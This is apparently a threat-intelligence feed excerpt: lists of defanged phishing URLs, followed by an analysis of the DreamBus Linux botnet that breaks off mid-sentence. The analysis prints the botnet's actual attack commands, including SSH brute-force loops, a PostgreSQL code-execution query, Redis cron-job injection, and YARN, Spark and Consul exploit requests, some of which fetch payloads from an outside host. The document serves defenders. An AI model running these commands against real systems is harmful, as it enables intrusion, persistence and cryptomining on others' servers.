storage[.]googleapis[.]com/adingled-862723013/index[.]html storage[.]googleapis[.]com/abootmaking-335640809/index[.]html storage[.]googleapis[.]com/ahiren-7401734/index[.]html storage[.]googleapis[.]com/ainca-12736189/index[.]html storage[.]googleapis[.]com/amoa-620648817/index[.]html storage[.]googleapis[.]com/alicitation-522842407/index[.]html storage[.]googleapis[.]com/aboatsmen-139464055/index[.]html storage[.]googleapis[.]com/aperform-352099829/adobe-login[.]html storage[.]googleapis[.]com/akartvelian-558252283/index[.]html storage[.]googleapis[.]com/ainvendibility-786043259/index[.]html storage[.]googleapis[.]com/aunshrine-323133029/index[.]html storage[.]googleapis[.]com/acondemns-905913782/index[.]html storage[.]googleapis[.]com/abrahmanist-186178631/index[.]html storage[.]googleapis[.]com/aunbars-780985519/index[.]html storage[.]googleapis[.]com/aqualitative-811176249/index[.]html storage[.]googleapis[.]com/ataleful-348821200/index[.]html storage[.]googleapis[.]com/anickstick-307761326/index[.]html storage[.]googleapis[.]com/alectorship-84927521/index[.]html storage[.]googleapis[.]com/aodea-208736814/index[.]html storage[.]googleapis[.]com/abridely-333489834/index[.]html storage[.]googleapis[.]com/amalodorant-950451553/index[.]html storage[.]googleapis[.]com/ayawled-911675812/index[.]html storage[.]googleapis[.]com/abirky-240459101/index[.]html storage[.]googleapis[.]com/aoverturning-255869875/index[.]html storage[.]googleapis[.]com/apseudophallic-889421432/billing[.]html storage[.]googleapis[.]com/amyelopathy-195390597/index[.]html storage[.]googleapis[.]com/arepairable-358680916/index[.]html storage[.]googleapis[.]com/asestines-42817349/index[.]html storage[.]googleapis[.]com/acrepitation-283172808/index[.]html storage[.]googleapis[.]com/ajaundiced-513977881/index[.]html storage[.]googleapis[.]com/aairable-214203130/index[.]html storage[.]googleapis[.]com/arheumatogenic-683716643/index[.]html storage[.]googleapis[.]com/amultidestination-847080470/index[.]html storage[.]googleapis[.]com/apolysomaty-898829058/index[.]html storage[.]googleapis[.]com/apoitrinaire-12614876/index[.]html storage[.]googleapis[.]com/askirwhit-47671358/index[.]html storage[.]googleapis[.]com/avoyeurism-318259797/index[.]html storage[.]googleapis[.]com/apampanga-166098500/index[.]html storage[.]googleapis[.]com/anun-908242083/index2[.]html storage[.]googleapis[.]com/adegradedly-277339018/index[.]html storage[.]googleapis[.]com/awhalings-302949577/index[.]html storage[.]googleapis[.]com/abalducta-915289519/index[.]html storage[.]googleapis[.]com/arelucted-787773075/index[.]html storage[.]googleapis[.]com/asupplementally-858070387/index[.]html storage[.]googleapis[.]com/afregatidae-217677069/index[.]html storage[.]googleapis[.]com/aracoyian-21862863/index[.]html storage[.]googleapis[.]com/ascotchwoman-979797192/index[.]html storage[.]googleapis[.]com/aantimoralism-54859598/index[.]html storage[.]googleapis[.]com/aouthaul-370806468/index[.]html storage[.]googleapis[.]com/ahercynian-275744290/index[.]html storage[.]googleapis[.]com/aphotopolymerization-352520518/index[.]html storage[.]googleapis[.]com/aoverdearness-492275680/index[.]html storage[.]googleapis[.]com/afergus-935018076/index[.]html storage[.]googleapis[.]com/aprovisory-825150401/index[.]html storage[.]googleapis[.]com/aphonasthenia-506169773/index[.]html storage[.]googleapis[.]com/apoley-215933269/index[.]html storage[.]googleapis[.]com/aslewingslews-789314006/index[.]html storage[.]googleapis[.]com/amicroradiographical-929577851/index[.]html storage[.]googleapis[.]com/aovist-532671161/index[.]html storage[.]googleapis[.]com/afusileers-968365817/index[.]html storage[.]googleapis[.]com/areducibility-583369670/index[.]html storage[.]googleapis[.]com/apooling-267239360/index[.]html storage[.]googleapis[.]com/alaparotomies-63776556/index[.]html storage[.]googleapis[.]com/adiskindness-885924575/index3[.]html storage[.]googleapis[.]com/akrater-612615588/index[.]html storage[.]googleapis[.]com/ashists-509747929/index[.]html storage[.]googleapis[.]com/apriestship-638820631/index[.]html storage[.]googleapis[.]com/aabune-670480603/index[.]html Campaign 3: login-51014-file.web[.]app onedrive-online718.web[.]app onedrive-online912.web[.]app onedrive-online642.web[.]app onedrive-online236.web[.]app Campaign 4: www[.]adotcomcompany[.]com/ofc3/r[.]php accessiondistribution[.]com/ofc3/r[.]php monteagudoadvogados[.]adv[.]br/ofc3/r[.]php reggaegills[.]com/ofc3/r[.]php aamanzano[.]com/home/ofc/r[.]php ourhomes[.]re/ofc3/r[.]php armata-neagra[.]ro/ofc3/r[.]php shakeandvape[.]com/b!/ofc/s/ candaceweststoryteller[.]com/ofc3/s/ cleanedgemanpower[.]com/ofc3/s/ fourcheriverdays[.]com/ofc3/s/ demandpower[.]ca/ofc3/s/ 420australia[.]com/ofc3/s/ rehdainstitute[.]com/ofc3/s/ corp-elrociosac[.]com/images/ofc3/r[.]php touch4career[.]com/ofc3/r[.]php the-vapors[.]eu/ofc3/r[.]php thewisetricks[.]com/ofc3/r[.]php monabelle[.]com[.]br/scss/ofc3/s/ dineshdesai[.]in/wp-admin/ot/ofc/s/ hpma[.]in/ofc3/s/ goticapp[.]com/x/ofc3/s/ gonzaloivangomez[.]com/folder/bin/refresheedofccieesforthenewtwentytwentyscamp/ofc1/s/ avyconsulting[.]in/ofc3/r[.]php alldelhi[.]com/ofc3/s/ nationalstandardtrustsavings[.]com/lf/ofc1/ofc1/le3_/ ventanalesbogota[.]com/ofc3/r[.]php 3x7konteyner[.]com/ofc3/s/ parmos[.]com[.]tr/ofc3/s/ www[.]storyofmeworkshop[.]com/x/ofc3/s/ sowamsheritagearea[.]org/cgi-bin/ofc3/s/ tailorbrandinsentive[.]net/home/ofc3/r[.]php shippingdocument[.]com/ofc3/s/ fuhrerscheinprofis[.]com/ofc3/s/ laparotools[.]com/img/33/ofc/s/ zyclone[.]net/ofc3/s/ Fri, 15 Jan 2021 09:24:09 -0800 Kaivalya Khursale DreamBus Botnet – Technical Analysis Zscaler’s ThreatLabZ research team recently analyzed a Linux-based malware family that we have dubbed the DreamBus Botnet. The malware is a variant of SystemdMiner, which consists of a series of Executable and Linkable Format (ELF) binaries and Unix shell scripts. Some components of the botnet have been analyzed in the past with the malware dating back to early 2019. Many of the DreamBus modules are poorly detected by security products. This is in part because Linux-based malware is less common than Windows-based malware, and thus receives less scrutiny from the security community. However, many critical business systems run on Linux systems, and malware that is able to gain access to these systems can cause significant disruption and irreparable harm to organizations that fail to secure their servers properly. The DreamBus malware exhibits worm-like behavior that is highly effective in spreading due its multifaceted approach to propagating itself across the internet and laterally through an internal network using a variety of methods. These techniques include numerous modules that exploit implicit trust, weak passwords, and unauthenticated remote code execution (RCE) vulnerabilities in popular applications, including Secure Shell (SSH), IT administration tools, a variety of cloud-based applications, and databases. These particular applications are targeted because they often run on systems that have powerful underlying hardware with significant amounts of memory and powerful CPUs—all of which allow threat actors to maximize their ability to monetize these resources through mining cryptocurrency. While the primary DreamBus malware payload is an open source Monero cryptocurrency miner known as XMRig, the threat actor can potentially pivot in the future to carrying out more destructive activities, such as ransomware or stealing an organization’s data and holding it hostage. Key Points DreamBus is a modular Linux-based botnet with worm-like behavior that has been around at least since early 2019 The malware can spread to systems that are not directly exposed to the internet by scanning private RFC 1918 subnet ranges for vulnerable systems DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools The botnet is currently monetized through leveraging infected systems to mine Monero cryptocurrency using XMRig The threat actor operating DreamBus appears to be located in Russia or Eastern Europe based on the time of deployment for new commands Technical analysis The main component of DreamBus is an ELF binary that is responsible for setting up the environment, infecting systems with copies of itself, downloading new modules for spreading, and deploying XMRig to mine Monero cryptocurrency. Each DreamBus ELF binary is packed by UPX with a modified header and footer. This alteration is designed to obfuscate the malware’s code and reduce the file size. The magic bytes UPX! (0x21585055) are typically replaced with non-ASCII values. Figure 1 shows an example of the UPX header replaced with the value 0x3330dddf. 00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 3e 00 01 00 00 00 d0 64 40 00 00 00 00 00 |..>......d@.....| 00000020 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |@...............| 00000030 00 00 00 00 40 00 38 00 03 00 40 00 00 00 00 00 |....@.8...@.....| 00000040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................| 00000050 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....| 00000060 b5 76 00 00 00 00 00 00 b5 76 00 00 00 00 00 00 |.v.......v......| 00000070 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 |.. .............| 00000080 00 00 00 00 00 00 00 00 00 80 40 00 00 00 00 00 |..........@.....| 00000090 00 80 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............| 000000a0 78 93 20 00 00 00 00 00 00 10 00 00 00 00 00 00 |x. .............| 000000b0 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 || 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000e0 10 00 00 00 00 00 00 00 18 b9 39 c1 df dd 30 33 |..........9...03| Figure 1. Example UPX header modified by DreamBus While this slight modification breaks the UPX command line tool, the ELF binary is still valid. Therefore, it can be unpacked and executed. This simple change may be sufficient to bypass some security software. Antivirus software often has low detection rates for DreamBus and its various modules. DreamBus is designed to be portable across a range of Unix and Linux-based operating systems. To be as portable as possible, the malware downloads various dependencies and components if they are not present on the compromised system. Botnet architecture DreamBus has a modular design with regular deployment of new modules and updates. Most command-and-control (C&C) components are hosted through TOR or on an anonymous file-sharing service such as oshi[.]at and leverage the HTTP protocol. The malware name is derived from the prefix of the TOR domain dreambusweduybcp[.]onion that has been used for C&C communications since July 2019. Figure 2 shows a high-level diagram of the DreamBus botnet architecture and its various modules. At the time of publication, Zscaler ThreatLabZ has observed modules designed to spread through SSH, PostgreSQL, Redis, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack. Many DreamBus plugins share code, for example, to create a lock file named 22 in the directory /tmp/.X11-unix/ and most set the name of the calling thread to tracepath. This is intended to disguise the DreamBus modules and make them appear to be legitimate (since many modules are downloaded with pseudo-randomly generated filenames). Figure 2. High-level diagram of the DreamBus botnet architecture Since not all compromised systems have TOR installed, DreamBus will use a proxy service such as tor2web to translate requests between TOR and the internet (described in more detail later in this analysis) DreamBus scanning behavior The success of DreamBus is dependent on spreading to as many systems as possible. Therefore, it scans systems that are on a local intranet as well as the internet. Most DreamBus modules scan the internal RFC 1918 ranges,, and for vulnerable applications that it targets. Figure 3 illustrates this scanning process. Figure 3. DreamBus scanning behavior for public and private networks Most DreamBus modules (with a few exceptions) scan the following internet ranges: [1-3].0.0.0/8 [12-15].0.0.0/8 [23-24].0.0.0/8 [34-47].0.0.0/8 [49-52].0.0.0/8 [57-98].0.0.0/8 [100-126].0.0.0/8 [128-213].0.0.0/8 [216-223].0.0.0/8 DreamBus main spreader module The main component of DreamBus has the ability to spread itself through SSH. This module is also downloaded over HTTP whenever an exploitation attempt is successful, typically through a number of hardcoded TOR domains. The HTTP request path to download the main DreamBus spreader module (after exploitation) is made in the format of the exploit that was successful, as shown in Table 1 Success Exploit Path Name Request /int.<arch> Main Spreader Module /sh.<arch> SSH Bruteforce /pg.<arch> or /pgl.<arch> PostgreSQL /rd.<arch> or /rdl.<arch> Redis /hdl.<arch> Hadoop YARN /sp.<arch> Apache Spark /csl.<arch> HashiCorp Consul /st.<arch> SaltStack Table 1. DreamBus pathnames to report a successful exploitation attempt and download the main spreader module The DreamBus spreader module contains seven shell scripts that are responsible for performing various actions. The first script is designed to set up a temporary directory that is used by the malware for lock files under /tmp/.X11-unix/. The DreamBus spreader module creates the lock file 01 in this directory. The malware then continues to execute a number of shell commands to set up the environment, and removes competing malware, other cryptocurrency miners, and cloud software. The shell scripts also define a set of variables and functions. DreamBus and its modules predominantly use cURL for network communications and set the HTTP user agent string to a hyphen (-) character. The shell scripts also define TOR domains that are used for C&C communications. Identical code is found in many of the second-stage DreamBus modules. The DreamBus function sockz() uses DNS over HTTP to resolve IP addresses for the domain name by querying the following domains: The function x() is used to establish persistence by creating a cron job that runs once per hour with the starting minute determined randomly between 0-58. The cron job will be created in one of the following locations: $HOME/ /opt/ /etc/cron.d/0systemd-service The cron will execute a shell script that will download an updated copy of the DreamBus malware over TOR. The function fexe() creates a file named i with the line exit in the infected user’s home directory, /tmp, /var/tmp and /usr/bin directories. It then attempts to execute the file and delete it. This is designed to find a directory in which the malware can write and execute files. Another DreamBus function named isys() decodes and executes a Base64 encoded string that downloads the cURL utility if it does not exist through the /dev/tcp device, or through wget. DreamBus will also download the socket statistics ss utility if it is not available. The function then attempts to use the yum and apt package managers to install and enable the cron service, and uninstall aegis and qcloud. The function issh() is designed to spread DreamBus through SSH. It attempts to use IT automation tools such as ansible, knife, salt, and pssh (parallel ssh) with a Base64 encoded string that contains shell commands to infect remote systems that will be discussed in more detail in the following paragraphs. This function also extracts hosts from a user’s bash_history, /etc/hosts file, and known_hosts file with grep using a regular expression, filtering entries that start with the prefix 127 (to remove localhost) as shown below: hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |grep -v ^127.|awk -F: {'print $2'}|sort|uniq) For each host, the module tries to authenticate as root using trusted SSH public key authentication: for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l root $h It then tries to authenticate to each remote server with the username of the compromised account with SSH public key authentication: for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l $USER $h If either the IT automation tools or SSH public key authentication attempts are successful, the main DreamBus spreader module will execute a series of commands on the remote system to retrieve the username, computername, architecture, and external IP address, compute an MD5 hash of the system’s network IP addresses, and list that user’s cron jobs. The newly compromised system will concatenate and append each value with an underscore and send an HTTP request over TOR with the result in the referrer field. Table 2 shows how these fields are obtained on an infected system External IP User Hardware Hostname MD5 Hash of IPs Cron Result of or whoami uname -m uname -n ip a | grep 'inet '| awk {'print $2'} | md5sum | awk {'print $1'} crontab -l | base64 -w0 Table 2. System information collected by DreamBus to track infections The TOR connection is established through a SOCKS5 proxy connection to one of the IPs resolved from the sockz() function to connect to a hardcoded TOR domain. If this fails, it will try to use an HTTP TOR proxy using one of the following services prepended with the hardcoded TOR domain. The main DreamBus spreader module will use one of these TOR proxies to send an HTTP request to the path /int.<arch>, where the architecture is determined by the command line uname -m. The response to this request is typically either the DreamBus spreader module or a series of shell commands to execute that is dependent on the system architecture. DreamBus provides support for the following hardware architectures, which includes both 32-bit and 64-bit versions: armv7l armv6l mips mips64el aarch64 i686 x86_64 The main spreader module also has a function named ibot() that is designed to report the infection back to the C&C server. This allows the threat actor to track infections and identify the exploits that are most effective. The request uses cURL (or wget as a fallback) to send an HTTP request to a hardcoded TOR domain with the path /bot. The same system information is passed in the HTTP referrer with the format shown in Table 2. The function called iscn() terminates processes named tracepath and sends an HTTP request with the path /trc to a hardcoded TOR domain. The output is saved to a file with a name determined by computing an MD5 hash from the output of the command line date utility. This file is then executed and deleted. In another shell script, DreamBus defines a function called u() that sends an HTTP request to the path /cmd to a hardcoded TOR domain and executes the result without saving it to disk. The same function name is also used to download an XMRig Monero miner from the path /cpu and the main spreader module /int.<arch> described above. The responses from the /trc and /cmd paths typically provide instructions to download second-stage modules that are used to propagate the malware further. These modules are described in the following sections. DreamBus SSH bruteforce module The SSH bruteforce module is delivered as a shell script that contains commands to download and extract a tar archive file named sshd into the directory /tmp/.X11-unix/sshd. Once extracted, there are three components, as shown in Table 3. Filename Description ss The tool pnscan used by DreamBus to scan for SSH servers on the local network ssh The tool sshpass for bruteforcing SSH passwords pw List of passwords to use for SSH bruteforce Table 3. Files extracted from the DreamBus SSH bruteforce module The first file named ss (not to be confused with the socket statistics application) is the open source tool Parallel Network Scanner (a.k.a., pnscan) compiled as an ELF binary. The second file named ssh is another ELF binary based on the open source tool sshpass that is designed to automate SSH authentication and shell script execution. The source code has been modified in several places including the supported command-line arguments to the following: Usage: sshpass address port username dict_file [threads=100] All second-stage DreamBus plugins, including the SSH bruteforce module, create a lock file named 22 in the lock file directory /tmp/.X11-unix/. Upon a successful SSH login, the code also includes a Base64 encoded shell script that will be executed on the remote host. The shell commands will download and execute the main DreamBus spreader module via the path /sh.<arch>. The pw file contains a list of approximately 2,711 passwords that are used for the SSH bruteforce attack and passed to the sshpass utility. The script attempts to move laterally within a private internal network by first enumerating the system’s network adapters and searching for regexes that loosely match RFC 1918 IP address ranges. The code writes a shell command to a file named r passing the sshpass application along with a placeholder for an IP address to launch an SSH bruteforce attack against various usernames (e.g., hadoop, jenkins, kafka, postgres, redis, root, ubuntu, vagrant, varnish, and yarn), and the file pw to use for the password dictionary. The pnscan tool ss is then used to scan the internal subnets for online SSH servers and saved to a file named ip. This file is then read by the script named r to launch the SSH bruteforce attack. The code for this process is shown below: echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do timeout 12m ./ssh $i 22 root ./pw >/dev/null 2>&1;done' > r chmod +x *;ulimit -n 60000;>ip;touch -r ss r ip n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2) n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2) n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2) [ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/16 22 >ip;./r) [ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r) [ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r) DreamBus PostgreSQL module PostgreSQL (or Postgres) is a popular open source SQL database application that is targeted by DreamBus. Zscaler ThreatLabZ has observed numerous versions of the DreamBus PostgreSQL module with several differences between them, such as code that sets the calling thread name, and the internet ranges and port numbers that are scanned. Most PostgreSQL modules use the standard tracepath naming convention mentioned earlier. However, some PostgreSQL modules set the calling thread name to postgres: logical replication launcher or postgres: autovacum. All versions of the DreamBus PostgreSQL modules spread by scanning the RFC 1918 private networks for PostgreSQL servers running on port 5432. However, the internet ranges that are scanned vary depending on the module version. Most of the modules scan the ranges listed in the DreamBus Scanning Behavior section of this report. However, at least one variant of the DreamBus PostgreSQL module scans all internet ranges between – on ports 5432 and 5433. In order to identify a PostgreSQL server, the DreamBus module sends the bytes 00 00 00 08 04 D2 16 00. These bytes start the SSL handshake to the PostgreSQL server. The last byte of the packet, however, has been set to NULL so that it will trigger an error message from a PostgreSQL server. More specifically, the DreamBus PostgreSQL module will check for the response unsupported frontend protocol. If this message is returned by the server, the module will attempt to exploit the system through a bruteforce password attack. The DreamBus PostgreSQL modules vary in the username and password lists that they use. To date, Zscaler ThreatLabZ has observed the following usernames (in aggregate) across these modules: postgres redmine root admin rdsdb clouder-scm dbadmin stolon odoo The PostgreSQL modules include a hardcoded dictionary of passwords, with samples containing approximately 2,627 entries. If the DreamBus module is able to authenticate using any of these passwords, the malware executes an SQL query similar to the following DROP TABLE IF EXISTS x0x0;CREATE TABLE x0x0(cmd_output text);COPY x0x0 FROM PROGRAM 'echo WFJBT...[snip]...1zIDkga2RldnRtcGZzaQpwcyB4IHxncmVwIGtpbnNpbmd8eGFyZ3Mga2lsbCAtOSAKcHMgeCB8Z3JlcCBrZGV2dG1wZnNpfHhhcmdzIGtpbGwgLTkgCmNyb250YWIgLWx8Z3JlcCAtdiBjdXJsfGNyb250YWIgLQpjcm9udGFiIC1sfGdyZXAgLXYgd2dldHxjcm9udGFiIC0K|base64 -d|bash';SELECT * FROM x0x0;DROP TABLE IF EXISTS x0x0; The database table name frequently changes (e.g., x0x0, abroxu, and putin) across the various PostgreSQL modules. This command exploits a disputed vulnerability CVE-2019-9193 that allows users with pg_execute_server_program privileges to execute arbitrary code. However, this behavior is considered to be a “feature” by PostgreSQL developers. The SQL query will cause a shell script to be Base64 decoded and executed. The content consists of a number of shell commands that will first kill competing malware such as kinsing. The subsequent commands contain shell commands similar to the main module that will attempt to download cURL if it is not available, resolve DNS over HTTP for a TOR relay, and connect to a hardcoded TOR domain to pull down the main module of DreamBus on the newly infected system via an HTTP request path such as /pg.<arch> or /pgl.<arch> that depends on the module version. DreamBus Redis module Redis is a popular open source data store that is used as a database, cache, and message broker. DreamBus regularly deploys second-stage modules that are designed to target Redis. The modules are very similar, all with the goal of achieving remote code execution via a misconfigured Redis installation that either does not require a password or has a weak password. These misconfigurations are well known to be exploited. Shodan estimated that approximately 56,000 Redis servers were misconfigured with no authentication required, and Imperva estimated that nearly 75 percent of open Redis instances had been compromised. Depending on the DreamBus Redis module version, the malware scans RFC 1918 private subnets on ports 6379, 7000, and 7001 and the internet ranges mentioned before. There are two primary versions of the DreamBus Redis module that either attempt to bruteforce weak passwords or exploit an instance with no password authentication. The Redis module that is designed to bruteforce passwords first checks if the Redis server requires authentication by sending the command info and searching for the string NOAUTH Authentication required. If this string is returned by the server, the Redis module will then send an AUTH command with a password chosen from a hardcoded dictionary, which has approximately 28,930 entries. It will then check for the response OK. from the Redis server to determine whether authentication was successful. If the password is able to be guessed, the Redis module sends the following commands: auth %s config set stop-writes-on-bgsave-error no flushall config set dir /etc/cron.d/ config set dbfilename systemdd set r1 "\n\n* * * * * root curl -fsS|sh\n\n" set r2 "\n\n* * * * * root wget -qO-|sh\n\n" save config set stop-writes-on-bgsave-error yes config set dir /tmp config set dbfilename .dump.rdb flushall Another version of the Redis module exploits systems that do not require authentication. This module first sends the Redis server an info command and searches for the string os:Linux. If this string is found, the Redis module sends the following commands: config set stop-writes-on-bgsave-error no flushall config set dir /etc/cron.d/ config set dbfilename systemdd set r1 "\n\n* * * * * root curl -fsS|sh\n\n" set r2 "\n\n* * * * * root wget -qO-|sh\n\n" save config set stop-writes-on-bgsave-error yes config set dir /tmp config set dbfilename .dump.rdb flushall Both attacks set the current directory to /etc/cron.d/ and create a file named systemdd within this directory through the dbfilename variable. Note that this requires the Redis server to have write permissions in the /etc/cron.d/ directory. The subsequent two lines will create cron jobs that will be executed every minute to download and execute a shell command specified by the server and run as the root user. The save command will write the content to disk as a Redis database (RDB) file and, therefore, contain an RDB header. In order for this exploit to work properly, the compromised system requires a cron implementation that will continue to parse the systemdd file after encountering the RDB header (which is not a valid cron format). Additionally, in modern versions of Redis, the RDB files are compressed with LZF by default, so the implanted cron jobs may further be neutralized. After attempting to write the RDB file containing two cron tasks, the Redis module changes the dir and dbfilename variables to dummy values to hide its modifications. There are two differences between these Redis modules’ commands. The auth command is only used by the authentication module, and the path on the web server to download and execute the second-stage shell script has the filename 0 (for the authentication module) versus 0l (for the module that spreads without authentication). The threat actor likely uses these two paths for statistical purposes to differentiate the versions of the Redis module that spread more effectively. If exploitation is successful, a shell script will be downloaded and executed, which in turn will download the DreamBus main spreader module via the path /rd.<arch> or /rdl.<arch> depending on the module version. DreamBus Hadoop YARN module YARN is the resource management and job scheduling/monitoring component of the open source Apache Hadoop distributed processing framework. The DreamBus Hadoop module uses built-in YARN functionality to execute arbitrary commands via Hadoop's ResourceManager REST API when authentication has not been configured. The DreamBus Hadoop YARN module first checks whether the file /usr/bin/wget is executable. If this file does not exist, the module exits. Otherwise, the module scans RFC 1918 private subnets and the internet ranges previously mentioned on port 8088. The first request made by the DreamBus Hadoop YARN module is used to identify YARN servers through the HTTP request: GET /stacks HTTP/1.1 Host: The module checks for the presence of the string Process Thread Dump in the server’s response. If a match is found, the DreamBus YARN module executes a series of shell commands. The first sends an HTTP POST request to the target server as shown below using wget: exec &>/dev/null;app_id=$(wget -qO- --post-data '' %s:%d/ws/v1/cluster/apps/new-application|grep -o "application_[0-9]*_[0-9]*"); The response is parsed for the application ID and stored in the app_id variable, which is required in the next request. After obtaining the app_id value, the module executes the following shell command. exec &>/dev/null;wget -qO- --post-data '{"am-container-spec": {"commands": {"command": "echo WFJBTkRPTQpleGVjIC...[snip]...AtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash"}},"application-id": "'$app_id'", "application-type": "YARN", "application-name": "'$app_id'"}' --header "Content-Type: application/json" %s:%d/ws/v1/cluster/apps &>/dev/null This command sends an HTTP POST request to the YARN server with parameters that include the application ID and a Base64 encoded shell command, which will be executed by the server without requiring any form of authentication. When the shell command is decoded and executed, it will download the main DreamBus spreader module using the path /hdl.<arch>. DreamBus Apache Spark module Apache Spark is an open source distributed cloud computing framework for large-scale data processing. This DreamBus module exploits a remote code execution vulnerability in Apache Spark when run in Standalone Mode and the Master REST URL is accessible. The exploit is similar to several proof-of-concept examples. The DreamBus Apache Spark module scans the same RFC 1918 private subnets and internet ranges as the other modules. The Apache Spark module first sends an HTTP request on port 6066 to the target server shown below: GET / HTTP/1.1 Host: The DreamBus module checks for SparkVersion in the response to identify whether the server is an Apache Spark server. If the response matches, the DreamBus module will launch the exploit by sending the following HTTP POST request, which contains a link to a Java ARchive (JAR) file that contains a class that will be executed by the Spark server: POST /v1/submissions/create HTTP/1.1 Host: %s:%d User-Agent: spark-api-cli Content-Type: application/json Content-Length: %d {"action": "CreateSubmissionRequest","clientSparkVersion": "2.1.0","appArgs": [""],"appResource": "http://94.237.85[.]89:8080/xapp.jar","environmentVariables": {"SPARK_ENV_LOADED": "1"},"mainClass": "xapp","sparkProperties": {"spark.jars": "http://94.237.85[.]89:8080/xapp.jar","spark.driver.supervise": "false","": "xapp","spark.eventLog.enabled": "false","spark.submit.deployMode": "cluster","spark.master": "spark://%s:%d"} } The payload is a JAR file named xapp.jar that contains a single class file named xapp.class. The code in this JAR invokes the shell /bin/sh and passes it Base64-encoded commands to execute as shown below: public class xapp { public static void main(String[] paramArrayOfString) throws Exception { String[] arrayOfString = new String[3]; arrayOfString[0] = "/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = "echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vz...[snip]...gxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash"; Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec(arrayOfString); } } When the shell command is decoded and executed, it will download the main DreamBus spreader module using the path /sp.<arch>. DreamBus HashiCorp Consul module HashiCorp Consul is a multicloud service networking platform to connect and secure services. This DreamBus module exploits a vulnerability in the HashiCorp Consul service’s API that enables remote code execution on Consul nodes. The exploit requires the settings EnableScriptChecks, EnableLocalScriptChecks, or EnableRemoteScriptChecks to be enabled on the server. The DreamBus module searches for Consul servers running on port 8500. The module scans the same internal and external ranges as the other modules. The first step in the scanning process is to locate Consul servers through the HTTP request shown below: GET /v1/agent/self HTTP/1.1 Host: The DreamBus Consul module expects a response that contains only the letter a. It’s not quite clear why the malware author chose to use this as a flag for detecting a HashiCorp Consul instance, since this is likely to result in many false positives. A similar exploit published by Metasploit checks for the EnableScriptChecks flags in the server response. If the expected response condition is met, the DreamBus module will then attempt to remove a service named systemd-service by sending the following HTTP PUT request to the Consul API: PUT /v1/agent/service/deregister/systemd-service HTTP/1.1 Host: %s:%d User-Agent: consul-api-c Content-Type: application/json After attempting to remove the service, the DreamBus Consul module will attempt to register a service with the same name as shown below: PUT /v1/agent/service/register HTTP/1.1 Host: %s:%d User-Agent: consul-api-c Content-Type: application/json Content-Length: %d {"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"Args": ["sh","-c","echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash"],"TTL": "120s"}} This registration command will register a service named systemd-service that executes Base64-encoded shell commands. These commands contain code similar to other DreamBus modules that attempt to download and install a cURL if it doesn’t exist on the system, and send a request to a hardcoded TOR domain with the filepath /csl.<arch>, which will download and execute the main DreamBus module. The shell commands will also loop through the compromised system’s network adapters and attempt to deregister the systemd-service through the API and through the shell commands shown below: ips=$(echo localhost; echo;hostname -i;ip a |grep "inet "|awk {'print $2'}|cut -d '/' -f 1;ifconfig |grep "inet "|awk {'print $2'}) for i in $ips ;do curl -m60 -X PUT http://$i:{8500}/v1/agent/service/deregister/systemd-service;done for i in $ips ;do wget -t1 -T60 -qO- --method=PUT http://$i:{8500}/v1/agent/service/deregister/systemd-service;done consul services deregister -id=systemd-service The DreamBus Consul module will then send three subsequent HTTP PUT requests to register the same service, but with a few slight variations of the command parameters using the script parameter (instead of the Args) as shown below: PUT /v1/agent/service/register HTTP/1.1 Host: %s:%d User-Agent: consul-api-c Content-Type: application/json Content-Length: %d {"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"script": "echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash","TTL": "120s"}} The third registration request is identical to the first registration request, but the module replaces the TTL field with the Interval field. PUT /v1/agent/service/register HTTP/1.1 Host: %s:%d User-Agent: consul-api-c Content-Type: application/json Content-Length: %d {"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"Args": ["sh","-c","echo 